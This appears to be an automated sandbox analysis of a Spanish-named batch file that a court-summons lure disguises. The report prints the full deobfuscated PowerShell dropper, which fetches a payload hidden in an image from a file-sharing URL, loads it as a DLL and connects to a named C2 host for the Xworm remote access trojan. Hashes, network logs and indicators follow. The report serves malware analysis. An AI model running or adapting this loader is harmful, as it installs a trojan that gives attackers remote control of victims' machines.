Analysis

  • max time kernel
    173s
  • max time network
    180s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    12-11-2024 20:46

General

  • Target

    En este sentido, se le hace un llamado de atención para que se presente ante el Juez del Circuito T.bat

  • Size

    210KB

  • MD5

    ed413cc9ec12454b62e10a58bb2e4213

  • SHA1

    a027ce72c41eb753d1e275eb955ddf8b323a84de

  • SHA256

    81fe1c16a0c91c2ce2b997dfa0d6c3ecb03af6a9494024d273b902b2f088ca6e

  • SHA512

    7ff5eb191033f5770f180ab3111fe6402cc9ac71540c6a6eda2b32e50a57e5b267a7006ce45f82b8e578962a5a2b7a605eda8cb525430fe889b4d941dd11f9cf

  • SSDEEP

    6144:vZ5PFlZSyyiQNfwJIJ9wNfX3T7jVrDjDb7bLw8:B

Malware Config

Extracted

Language
ps1
Deobfuscated
$base64url = "aHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1tTDJfVG5JR0tRcW9jQjZ6THZjdk42OFRxX0ZwZkM0R2g4VkNnc3pfaURocVUzVVhfSF9veHYzY1V5c09VTHBNJnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDg1MTQ3MGEwOTA0Zg=="
$url = "https://3105.filemail.com/api/file/get?filekey=mL2_TnIGKQqocB6zLvcvN68Tq_FpfC4Gh8VCgsz_iDhqU3UX_H_oxv3cUysOULpM&pk_vid=fd4f614bb209c62c1730851470a0904f"
$webclient = new-object system.net.webclient
$imagebytes = $webclient.downloaddata("https://3105.filemail.com/api/file/get?filekey=mL2_TnIGKQqocB6zLvcvN68Tq_FpfC4Gh8VCgsz_iDhqU3UX_H_oxv3cUysOULpM&pk_vid=fd4f614bb209c62c1730851470a0904f")
$imagetext = ([system.text.encoding]::ascii).getstring($imagebytes)
$startflag = "<<BASE64_START>>"
$endflag = "<<BASE64_END>>"
$startindex = $imagetext.indexof("<<BASE64_START>>")
$endindex = $imagetext.indexof("<<BASE64_END>>")
$startindex -ge 0 -and $endindex -gt $startindex
$startindex = $startflag.length
$base64length = $endindex - $startindex
$base64command = $imagetext.substring($startindex, $base64length)
$dllbytes = [convert]::frombase64string($base64command)
$assembly = [system.reflection.assembly]::load($dllbytes)
[stub.main]::main("barrioantioquia.webredirect.org", "6095")
URLs
ps1.dropper

https://3105.filemail.com/api/file/get?filekey=mL2_TnIGKQqocB6zLvcvN68Tq_FpfC4Gh8VCgsz_iDhqU3UX_H_oxv3cUysOULpM&pk_vid=fd4f614bb209c62c1730851470a0904f

exe.dropper

https://3105.filemail.com/api/file/get?filekey=mL2_TnIGKQqocB6zLvcvN68Tq_FpfC4Gh8VCgsz_iDhqU3UX_H_oxv3cUysOULpM&pk_vid=fd4f614bb209c62c1730851470a0904f

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 19 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell with its display window hidden.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\En este sentido, se le hace un llamado de atención para que se presente ante el Juez del Circuito T.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4680
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$base64Url = 'aHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1tTDJfVG5JR0tRcW9jQjZ6THZjdk42OFRxX0ZwZkM0R2g4VkNnc3pfaURocVUzVVhfSF9veHYzY1V5c09VTHBNJnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDg1MTQ3MGEwOTA0Zg=='; $url = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64Url)); $webClient = New-Object System.Net.WebClient; $imageBytes = $webClient.DownloadData($url); $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); $startIndex -ge 0 -and $endIndex -gt $startIndex; $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $dllBytes = [Convert]::FromBase64String($base64Command); $assembly = [System.Reflection.Assembly]::Load($dllBytes); [Stub.main]::Main('barrioantioquia.webredirect.org', '6095');"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5012

Network

  • flag-us
    DNS
    3105.filemail.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    3105.filemail.com
    IN A
    Response
    3105.filemail.com
    IN CNAME
    ip.3105.filemail.com
    ip.3105.filemail.com
    IN A
    193.30.119.205
  • flag-no
    GET
    https://3105.filemail.com/api/file/get?filekey=mL2_TnIGKQqocB6zLvcvN68Tq_FpfC4Gh8VCgsz_iDhqU3UX_H_oxv3cUysOULpM&pk_vid=fd4f614bb209c62c1730851470a0904f
    powershell.exe
    Remote address:
    193.30.119.205:443
    Request
    GET /api/file/get?filekey=mL2_TnIGKQqocB6zLvcvN68Tq_FpfC4Gh8VCgsz_iDhqU3UX_H_oxv3cUysOULpM&pk_vid=fd4f614bb209c62c1730851470a0904f HTTP/1.1
    Host: 3105.filemail.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Content-Length: 5353433
    Content-Type: image/jpeg
    Last-Modified: Wed, 06 Nov 2024 00:04:10 GMT
    Accept-Ranges: bytes
    ETag: 078712b9591b4fb096f2292adece0898
    X-Transfer-ID: ibybhsntnwgamsn
    Content-Disposition: attachment; filename=DetahNotwe.jpg
    Date: Tue, 12 Nov 2024 20:46:10 GMT
  • flag-us
    DNS
    13.86.106.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    13.86.106.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    205.119.30.193.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    205.119.30.193.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    22.160.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    22.160.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    97.17.167.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    97.17.167.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    209.205.72.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    209.205.72.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    barrioantioquia.webredirect.org
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    barrioantioquia.webredirect.org
    IN A
    Response
    barrioantioquia.webredirect.org
    IN A
    5.79.98.102
  • flag-us
    DNS
    212.20.149.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    212.20.149.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    198.187.3.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    198.187.3.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    73.190.18.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    73.190.18.2.in-addr.arpa
    IN PTR
    Response
    73.190.18.2.in-addr.arpa
    IN PTR
    a2-18-190-73.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    22.236.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    22.236.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    barrioantioquia.webredirect.org
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    barrioantioquia.webredirect.org
    IN A
    Response
    barrioantioquia.webredirect.org
    IN A
    5.79.98.102
  • 193.30.119.205:443
    https://3105.filemail.com/api/file/get?filekey=mL2_TnIGKQqocB6zLvcvN68Tq_FpfC4Gh8VCgsz_iDhqU3UX_H_oxv3cUysOULpM&pk_vid=fd4f614bb209c62c1730851470a0904f
    tls, http
    powershell.exe
    112.0kB
    5.5MB
    2300
    3998

    HTTP Request

    GET https://3105.filemail.com/api/file/get?filekey=mL2_TnIGKQqocB6zLvcvN68Tq_FpfC4Gh8VCgsz_iDhqU3UX_H_oxv3cUysOULpM&pk_vid=fd4f614bb209c62c1730851470a0904f

    HTTP Response

    200
  • 5.79.98.102:6095
    barrioantioquia.webredirect.org
    powershell.exe
    260 B
    200 B
    5
    5
  • 5.79.98.102:6095
    barrioantioquia.webredirect.org
    powershell.exe
    260 B
    200 B
    5
    5
  • 5.79.98.102:6095
    barrioantioquia.webredirect.org
    powershell.exe
    260 B
    200 B
    5
    5
  • 5.79.98.102:6095
    barrioantioquia.webredirect.org
    powershell.exe
    260 B
    160 B
    5
    4
  • 5.79.98.102:6095
    barrioantioquia.webredirect.org
    powershell.exe
    260 B
    160 B
    5
    4
  • 5.79.98.102:6095
    barrioantioquia.webredirect.org
    powershell.exe
    260 B
    160 B
    5
    4
  • 5.79.98.102:6095
    barrioantioquia.webredirect.org
    powershell.exe
    260 B
    160 B
    5
    4
  • 5.79.98.102:6095
    barrioantioquia.webredirect.org
    powershell.exe
    260 B
    160 B
    5
    4
  • 5.79.98.102:6095
    barrioantioquia.webredirect.org
    powershell.exe
    260 B
    200 B
    5
    5
  • 5.79.98.102:6095
    barrioantioquia.webredirect.org
    powershell.exe
    260 B
    200 B
    5
    5
  • 5.79.98.102:6095
    barrioantioquia.webredirect.org
    powershell.exe
    260 B
    200 B
    5
    5
  • 5.79.98.102:6095
    barrioantioquia.webredirect.org
    powershell.exe
    260 B
    200 B
    5
    5
  • 5.79.98.102:6095
    barrioantioquia.webredirect.org
    powershell.exe
    260 B
    200 B
    5
    5
  • 5.79.98.102:6095
    barrioantioquia.webredirect.org
    powershell.exe
    260 B
    200 B
    5
    5
  • 5.79.98.102:6095
    barrioantioquia.webredirect.org
    powershell.exe
    260 B
    200 B
    5
    5
  • 5.79.98.102:6095
    barrioantioquia.webredirect.org
    powershell.exe
    260 B
    200 B
    5
    5
  • 5.79.98.102:6095
    barrioantioquia.webredirect.org
    powershell.exe
    260 B
    200 B
    5
    5
  • 5.79.98.102:6095
    barrioantioquia.webredirect.org
    powershell.exe
    260 B
    200 B
    5
    5
  • 8.8.8.8:53
    3105.filemail.com
    dns
    powershell.exe
    63 B
    96 B
    1
    1

    DNS Request

    3105.filemail.com

    DNS Response

    193.30.119.205

  • 8.8.8.8:53
    13.86.106.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    13.86.106.20.in-addr.arpa

  • 8.8.8.8:53
    205.119.30.193.in-addr.arpa
    dns
    73 B
    131 B
    1
    1

    DNS Request

    205.119.30.193.in-addr.arpa

  • 8.8.8.8:53
    22.160.190.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    22.160.190.20.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    97.17.167.52.in-addr.arpa
    dns
    71 B
    145 B
    1
    1

    DNS Request

    97.17.167.52.in-addr.arpa

  • 8.8.8.8:53
    209.205.72.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    209.205.72.20.in-addr.arpa

  • 8.8.8.8:53
    barrioantioquia.webredirect.org
    dns
    powershell.exe
    77 B
    93 B
    1
    1

    DNS Request

    barrioantioquia.webredirect.org

    DNS Response

    5.79.98.102

  • 8.8.8.8:53
    212.20.149.52.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    212.20.149.52.in-addr.arpa

  • 8.8.8.8:53
    198.187.3.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    198.187.3.20.in-addr.arpa

  • 8.8.8.8:53
    73.190.18.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    73.190.18.2.in-addr.arpa

  • 8.8.8.8:53
    22.236.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    22.236.111.52.in-addr.arpa

  • 8.8.8.8:53
    barrioantioquia.webredirect.org
    dns
    powershell.exe
    77 B
    93 B
    1
    1

    DNS Request

    barrioantioquia.webredirect.org

    DNS Response

    5.79.98.102

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1optzohf.5ya.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/5012-2-0x00007FFD35CE3000-0x00007FFD35CE5000-memory.dmp

    Filesize

    8KB

  • memory/5012-8-0x00000179B9030000-0x00000179B9052000-memory.dmp

    Filesize

    136KB

  • memory/5012-13-0x00007FFD35CE0000-0x00007FFD367A1000-memory.dmp

    Filesize

    10.8MB

  • memory/5012-14-0x00007FFD35CE0000-0x00007FFD367A1000-memory.dmp

    Filesize

    10.8MB

  • memory/5012-15-0x00000179BB550000-0x00000179BB8E4000-memory.dmp

    Filesize

    3.6MB

  • memory/5012-16-0x00007FFD35CE3000-0x00007FFD35CE5000-memory.dmp

    Filesize

    8KB

  • memory/5012-17-0x00007FFD35CE0000-0x00007FFD367A1000-memory.dmp

    Filesize

    10.8MB

  • memory/5012-18-0x00007FFD35CE0000-0x00007FFD367A1000-memory.dmp

    Filesize

    10.8MB
